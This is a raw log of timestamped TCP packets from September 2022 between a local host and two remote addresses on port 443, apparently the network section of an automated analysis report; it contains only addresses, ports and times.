Sep 29, 2022 14:49:49.263128042 CEST	49719	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:49:49.264795065 CEST	443	49719	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:49.264817953 CEST	443	49719	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:49.264923096 CEST	49719	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:49:49.264946938 CEST	443	49719	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:49.273648024 CEST	443	49719	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:49.273682117 CEST	443	49719	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:49.273796082 CEST	49719	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:49:49.273827076 CEST	443	49719	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:49.273849010 CEST	49719	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:49:49.274946928 CEST	443	49719	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:49.274971962 CEST	443	49719	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:49.275033951 CEST	49719	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:49:49.275058031 CEST	443	49719	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:49.275077105 CEST	49719	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:49:49.276038885 CEST	443	49719	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:49.276067019 CEST	443	49719	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:49.276145935 CEST	49719	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:49:49.276174068 CEST	443	49719	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:49.276197910 CEST	49719	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:49:49.277708054 CEST	443	49719	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:49.277733088 CEST	443	49719	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:49.277786970 CEST	49719	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:49:49.277812958 CEST	443	49719	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:49.277828932 CEST	49719	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:49:49.278593063 CEST	443	49719	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:49.278626919 CEST	443	49719	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:49.278681993 CEST	49719	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:49:49.278701067 CEST	443	49719	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:49.278717041 CEST	49719	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:49:49.279762030 CEST	443	49719	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:49.279788971 CEST	443	49719	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:49.279859066 CEST	49719	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:49:49.279880047 CEST	443	49719	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:49.279925108 CEST	49719	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:49:49.280742884 CEST	443	49719	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:49.280776024 CEST	443	49719	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:49.280843973 CEST	49719	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:49:49.280883074 CEST	443	49719	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:49.280909061 CEST	49719	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:49:49.281815052 CEST	443	49719	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:49.281847954 CEST	443	49719	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:49.281929970 CEST	49719	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:49:49.281949043 CEST	443	49719	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:49.281976938 CEST	49719	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:49:49.289565086 CEST	443	49719	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:49.289599895 CEST	443	49719	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:49.289696932 CEST	443	49719	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:49.289750099 CEST	49719	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:49:49.289777994 CEST	443	49719	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:49.289900064 CEST	49719	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:49:49.289979935 CEST	49719	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:49:49.290169001 CEST	443	49719	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:49.290200949 CEST	443	49719	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:49.290318012 CEST	49719	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:49:49.290318012 CEST	49719	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:49:49.290342093 CEST	443	49719	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:49.290397882 CEST	49719	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:49:49.291198015 CEST	443	49719	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:49.291229963 CEST	443	49719	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:49.291305065 CEST	49719	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:49:49.291321039 CEST	443	49719	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:49.291348934 CEST	49719	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:49:49.291369915 CEST	49719	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:49:49.291433096 CEST	443	49719	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:49.291457891 CEST	443	49719	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:49.291510105 CEST	49719	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:49:49.291518927 CEST	443	49719	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:49.291554928 CEST	49719	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:49:49.291583061 CEST	49719	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:49:49.292292118 CEST	443	49719	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:49.292315960 CEST	443	49719	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:49.292423964 CEST	49719	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:49:49.292433023 CEST	443	49719	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:49.292445898 CEST	49719	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:49:49.292476892 CEST	49719	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:49:49.293289900 CEST	443	49719	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:49.293353081 CEST	443	49719	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:49.293431997 CEST	49719	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:49:49.293441057 CEST	443	49719	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:49.293478966 CEST	49719	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:49:49.293495893 CEST	49719	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:49:49.293889046 CEST	443	49719	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:49.293911934 CEST	443	49719	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:49.293984890 CEST	49719	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:49:49.293992996 CEST	443	49719	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:49.294028044 CEST	49719	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:49:49.294059992 CEST	49719	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:49:49.294231892 CEST	443	49719	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:49.294255972 CEST	443	49719	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:49.294306040 CEST	49719	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:49:49.294315100 CEST	443	49719	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:49.294348955 CEST	49719	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:49:49.294384956 CEST	49719	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:49:49.295023918 CEST	443	49719	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:49.295051098 CEST	443	49719	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:49.295131922 CEST	49719	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:49:49.295142889 CEST	443	49719	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:49.295201063 CEST	49719	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:49:49.295201063 CEST	49719	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:49:49.295528889 CEST	443	49719	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:49.295648098 CEST	49719	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:49:49.295636892 CEST	443	49719	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:49.295684099 CEST	443	49719	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:49.295701027 CEST	443	49719	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:49.295742989 CEST	49719	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:49:49.295767069 CEST	49719	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:49:49.296303034 CEST	49719	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:49:54.887208939 CEST	49720	443	192.168.2.6	140.82.121.4
Sep 29, 2022 14:49:54.887259960 CEST	443	49720	140.82.121.4	192.168.2.6
Sep 29, 2022 14:49:54.887377024 CEST	49720	443	192.168.2.6	140.82.121.4
Sep 29, 2022 14:49:54.887876034 CEST	49720	443	192.168.2.6	140.82.121.4
Sep 29, 2022 14:49:54.887902975 CEST	443	49720	140.82.121.4	192.168.2.6
Sep 29, 2022 14:49:54.931502104 CEST	443	49720	140.82.121.4	192.168.2.6
Sep 29, 2022 14:49:54.938333035 CEST	49720	443	192.168.2.6	140.82.121.4
Sep 29, 2022 14:49:54.938364983 CEST	443	49720	140.82.121.4	192.168.2.6
Sep 29, 2022 14:49:55.119798899 CEST	443	49720	140.82.121.4	192.168.2.6
Sep 29, 2022 14:49:55.119915962 CEST	443	49720	140.82.121.4	192.168.2.6
Sep 29, 2022 14:49:55.120002031 CEST	443	49720	140.82.121.4	192.168.2.6
Sep 29, 2022 14:49:55.120012045 CEST	49720	443	192.168.2.6	140.82.121.4
Sep 29, 2022 14:49:55.120054007 CEST	49720	443	192.168.2.6	140.82.121.4
Sep 29, 2022 14:49:55.120872974 CEST	49720	443	192.168.2.6	140.82.121.4
Sep 29, 2022 14:49:55.122253895 CEST	49721	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:49:55.122353077 CEST	443	49721	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:55.122477055 CEST	49721	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:49:55.123142004 CEST	49721	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:49:55.123167992 CEST	443	49721	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:55.166513920 CEST	443	49721	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:55.210694075 CEST	49721	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:49:55.210735083 CEST	443	49721	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:55.538048983 CEST	443	49721	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:55.540568113 CEST	443	49721	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:55.540601969 CEST	443	49721	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:55.540632963 CEST	443	49721	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:55.540683031 CEST	443	49721	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:55.540775061 CEST	49721	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:49:55.540807009 CEST	443	49721	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:55.540842056 CEST	49721	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:49:55.540914059 CEST	49721	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:49:55.543498039 CEST	443	49721	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:55.543541908 CEST	443	49721	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:55.543720961 CEST	49721	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:49:55.543759108 CEST	443	49721	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:55.555176020 CEST	443	49721	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:55.555242062 CEST	443	49721	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:55.555438042 CEST	49721	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:49:55.555469036 CEST	443	49721	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:55.557539940 CEST	443	49721	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:55.557590008 CEST	443	49721	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:55.557763100 CEST	49721	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:49:55.557796001 CEST	443	49721	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:55.562706947 CEST	443	49721	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:55.562750101 CEST	443	49721	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:55.562841892 CEST	443	49721	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:55.562866926 CEST	443	49721	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:55.562916994 CEST	49721	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:49:55.562943935 CEST	443	49721	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:55.563019037 CEST	49721	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:49:55.563723087 CEST	49721	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:49:55.570188046 CEST	443	49721	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:55.570231915 CEST	443	49721	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:55.570292950 CEST	443	49721	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:55.570362091 CEST	49721	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:49:55.570385933 CEST	443	49721	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:55.570403099 CEST	443	49721	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:55.570462942 CEST	49721	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:49:55.570558071 CEST	49721	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:49:55.571557999 CEST	49721	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:02.259569883 CEST	49722	443	192.168.2.6	140.82.121.4
Sep 29, 2022 14:50:02.259627104 CEST	443	49722	140.82.121.4	192.168.2.6
Sep 29, 2022 14:50:02.259716988 CEST	49722	443	192.168.2.6	140.82.121.4
Sep 29, 2022 14:50:02.260242939 CEST	49722	443	192.168.2.6	140.82.121.4
Sep 29, 2022 14:50:02.260257959 CEST	443	49722	140.82.121.4	192.168.2.6
Sep 29, 2022 14:50:02.306296110 CEST	443	49722	140.82.121.4	192.168.2.6
Sep 29, 2022 14:50:02.309192896 CEST	49722	443	192.168.2.6	140.82.121.4
Sep 29, 2022 14:50:02.309226990 CEST	443	49722	140.82.121.4	192.168.2.6
Sep 29, 2022 14:50:02.340811014 CEST	443	49722	140.82.121.4	192.168.2.6
Sep 29, 2022 14:50:02.340944052 CEST	443	49722	140.82.121.4	192.168.2.6
Sep 29, 2022 14:50:02.341027021 CEST	443	49722	140.82.121.4	192.168.2.6
Sep 29, 2022 14:50:02.341058016 CEST	49722	443	192.168.2.6	140.82.121.4
Sep 29, 2022 14:50:02.341128111 CEST	49722	443	192.168.2.6	140.82.121.4
Sep 29, 2022 14:50:02.341778040 CEST	49722	443	192.168.2.6	140.82.121.4
Sep 29, 2022 14:50:02.342749119 CEST	49723	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:02.342811108 CEST	443	49723	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:02.342909098 CEST	49723	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:02.343313932 CEST	49723	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:02.343338966 CEST	443	49723	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:02.388492107 CEST	443	49723	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:02.390198946 CEST	49723	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:02.390228033 CEST	443	49723	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:02.417335033 CEST	443	49723	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:02.417490005 CEST	443	49723	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:02.417576075 CEST	443	49723	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:02.417601109 CEST	49723	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:02.417654037 CEST	443	49723	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:02.417716026 CEST	49723	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:02.417733908 CEST	443	49723	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:02.417830944 CEST	443	49723	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:02.417895079 CEST	49723	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:02.417915106 CEST	443	49723	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:02.418018103 CEST	443	49723	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:02.418082952 CEST	49723	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:02.418107986 CEST	443	49723	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:02.418230057 CEST	443	49723	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:02.418282032 CEST	49723	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:02.418307066 CEST	443	49723	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:02.418771029 CEST	443	49723	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:02.418868065 CEST	49723	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:02.418921947 CEST	443	49723	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:02.421834946 CEST	443	49723	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:02.421886921 CEST	443	49723	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:02.421967030 CEST	49723	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:02.422020912 CEST	443	49723	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:02.422046900 CEST	49723	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:02.422077894 CEST	49723	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:02.433804989 CEST	443	49723	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:02.433885098 CEST	443	49723	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:02.434014082 CEST	49723	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:02.434052944 CEST	443	49723	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:02.434077024 CEST	49723	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:02.436034918 CEST	443	49723	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:02.436075926 CEST	443	49723	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:02.436131954 CEST	49723	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:02.436163902 CEST	443	49723	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:02.436189890 CEST	49723	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:02.438523054 CEST	443	49723	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:02.438556910 CEST	443	49723	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:02.439076900 CEST	49723	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:02.439109087 CEST	443	49723	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:02.439795971 CEST	443	49723	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:02.439836979 CEST	443	49723	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:02.439915895 CEST	49723	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:02.439943075 CEST	443	49723	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:02.439958096 CEST	49723	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:02.449317932 CEST	443	49723	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:02.449343920 CEST	443	49723	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:02.449521065 CEST	49723	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:02.449573040 CEST	443	49723	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:02.450361013 CEST	443	49723	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:02.450387001 CEST	443	49723	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:02.450484037 CEST	49723	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:02.450514078 CEST	443	49723	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:02.450532913 CEST	49723	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:02.452058077 CEST	443	49723	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:02.452075005 CEST	443	49723	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:02.452186108 CEST	49723	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:02.452214003 CEST	443	49723	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:02.452230930 CEST	49723	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:02.453039885 CEST	443	49723	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:02.453080893 CEST	443	49723	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:02.453217030 CEST	49723	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:02.453241110 CEST	443	49723	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:02.454390049 CEST	443	49723	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:02.454410076 CEST	443	49723	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:02.454456091 CEST	443	49723	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:02.454507113 CEST	49723	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:02.454533100 CEST	443	49723	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:02.454550028 CEST	49723	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:02.454555035 CEST	443	49723	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:02.454618931 CEST	49723	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:02.472927094 CEST	49723	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:08.753123045 CEST	49725	443	192.168.2.6	140.82.121.4
Sep 29, 2022 14:50:08.753209114 CEST	443	49725	140.82.121.4	192.168.2.6
Sep 29, 2022 14:50:08.753305912 CEST	49725	443	192.168.2.6	140.82.121.4
Sep 29, 2022 14:50:08.753814936 CEST	49725	443	192.168.2.6	140.82.121.4
Sep 29, 2022 14:50:08.753860950 CEST	443	49725	140.82.121.4	192.168.2.6
Sep 29, 2022 14:50:08.800215006 CEST	443	49725	140.82.121.4	192.168.2.6
Sep 29, 2022 14:50:08.807096004 CEST	49725	443	192.168.2.6	140.82.121.4
Sep 29, 2022 14:50:08.807148933 CEST	443	49725	140.82.121.4	192.168.2.6
Sep 29, 2022 14:50:08.832740068 CEST	443	49725	140.82.121.4	192.168.2.6
Sep 29, 2022 14:50:08.832854986 CEST	443	49725	140.82.121.4	192.168.2.6
Sep 29, 2022 14:50:08.832945108 CEST	443	49725	140.82.121.4	192.168.2.6
Sep 29, 2022 14:50:08.832952023 CEST	49725	443	192.168.2.6	140.82.121.4
Sep 29, 2022 14:50:08.833060980 CEST	49725	443	192.168.2.6	140.82.121.4
Sep 29, 2022 14:50:08.833815098 CEST	49725	443	192.168.2.6	140.82.121.4
Sep 29, 2022 14:50:08.835515022 CEST	49726	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:08.835578918 CEST	443	49726	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:08.836101055 CEST	49726	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:08.836278915 CEST	49726	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:08.836333990 CEST	443	49726	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:08.883932114 CEST	443	49726	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:08.886581898 CEST	49726	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:08.886640072 CEST	443	49726	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:09.121150017 CEST	443	49726	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:09.123450994 CEST	443	49726	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:09.123486996 CEST	443	49726	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:09.123585939 CEST	49726	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:09.123605967 CEST	443	49726	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:09.123665094 CEST	49726	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:09.123975992 CEST	49726	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:09.127024889 CEST	443	49726	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:09.127099991 CEST	443	49726	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:09.127146006 CEST	49726	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:09.127161026 CEST	443	49726	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:09.127274036 CEST	49726	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:09.138171911 CEST	443	49726	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:09.138232946 CEST	443	49726	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:09.138364077 CEST	49726	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:09.138364077 CEST	49726	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:09.138396978 CEST	443	49726	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:09.140727043 CEST	443	49726	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:09.140763998 CEST	443	49726	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:09.141098022 CEST	49726	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:09.141098022 CEST	49726	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:09.141130924 CEST	443	49726	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:09.142138004 CEST	443	49726	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:09.142184973 CEST	443	49726	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:09.142239094 CEST	49726	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:09.142268896 CEST	443	49726	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:09.142920017 CEST	49726	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:09.143935919 CEST	443	49726	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:09.143965960 CEST	443	49726	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:09.144340992 CEST	49726	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:09.144340992 CEST	49726	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:09.144370079 CEST	443	49726	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:09.152498007 CEST	443	49726	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:09.152558088 CEST	443	49726	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:09.152693987 CEST	49726	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:09.152693987 CEST	49726	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:09.152717113 CEST	443	49726	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:09.153938055 CEST	443	49726	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:09.153975964 CEST	443	49726	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:09.154113054 CEST	49726	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:09.154113054 CEST	49726	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:09.154139042 CEST	443	49726	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:09.154859066 CEST	443	49726	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:09.154922962 CEST	443	49726	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:09.155013084 CEST	49726	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:09.155013084 CEST	49726	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:09.155064106 CEST	443	49726	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:09.156665087 CEST	443	49726	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:09.156699896 CEST	443	49726	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:09.156781912 CEST	49726	443	192.168.2.6	185.199.108.133
